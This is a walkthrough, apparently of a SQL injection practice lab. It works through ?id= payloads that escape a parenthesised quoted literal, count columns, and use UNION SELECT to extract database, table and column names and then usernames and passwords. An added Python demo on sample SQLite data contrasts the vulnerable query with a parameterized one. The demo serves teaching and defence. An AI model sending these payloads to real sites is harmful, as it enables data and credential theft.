1. Initial state:
2. As usual, start with ?id=1:
3. Enter ?id=1 and 1=2--+; there is no error and the page looks exactly as before.
4. Try adding a single quote: ?id=1' order by 3--+
Error message:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 3-- ') LIMIT 0,1' at line 1
From this we can tell that the rest of the query we want to run is wrapped in parentheses, so adjust the input accordingly; the page then returns to normal:
?id=1') order by 3--+
Counting the columns: an error occurs when 4 is entered, so the column count is 3:
?id=1') order by 4--+
5. Find the displayed positions:
?id=-1') union select 1,2,3--+
6. Start retrieving database names:
Current database:
?id=-1') union select 1,database(),3--+
All databases:
?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata--+
7. Get the table names in the current database:
?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
8. Get the columns of the users table:
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
9. Almost done; the last step is to retrieve username and password:
?id=-1') union select 1,group_concat(username),group_concat(password) from users--+
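An added example, not part of the original walkthrough, that reproduces the `id=('$id') LIMIT 0,1` query shape the error message reveals, using an in-memory SQLite table, and shows why the closing `')` breaks out of the literal, next to the bound-parameter form that treats the same input as a plain value. The table name `users` and the columns come from the page; the rows and credentials are constructed sample data.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the lab's users table (sample rows, not real data).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?,?,?)",
        [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")],
    )
    return con


def vulnerable_lookup(con, id_value):
    # Vulnerable pattern: the request value is pasted into ... WHERE id=('...') LIMIT 0,1,
    # so an input beginning with ') closes the literal and the parentheses, and a
    # trailing "-- " comments out the ') LIMIT 0,1 tail the application appends.
    sql = "SELECT id,username,password FROM users WHERE id=('%s') LIMIT 0,1" % id_value
    return con.execute(sql).fetchall()


def safe_lookup(con, id_value):
    # Hardened form: the same query with a bound parameter. The value is compared
    # as one literal and never parsed as SQL, so quotes, parentheses, UNION and
    # comment markers in it have no syntactic effect.
    sql = "SELECT id,username,password FROM users WHERE id=(?) LIMIT 0,1"
    return con.execute(sql, (id_value,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    # URL-decoded form of the page's final payload ("--+" arrives as "-- ").
    payload = ("-1') union select 1,group_concat(username),"
               "group_concat(password) from users-- ")
    print("normal:    ", vulnerable_lookup(con, "1"))
    print("vulnerable:", vulnerable_lookup(con, payload))  # attacker-chosen row
    print("safe:      ", safe_lookup(con, payload))        # no rows
```

The vulnerable function returns a row built entirely from the injected UNION, while the parameterized one returns nothing for the same input because no id equals that string.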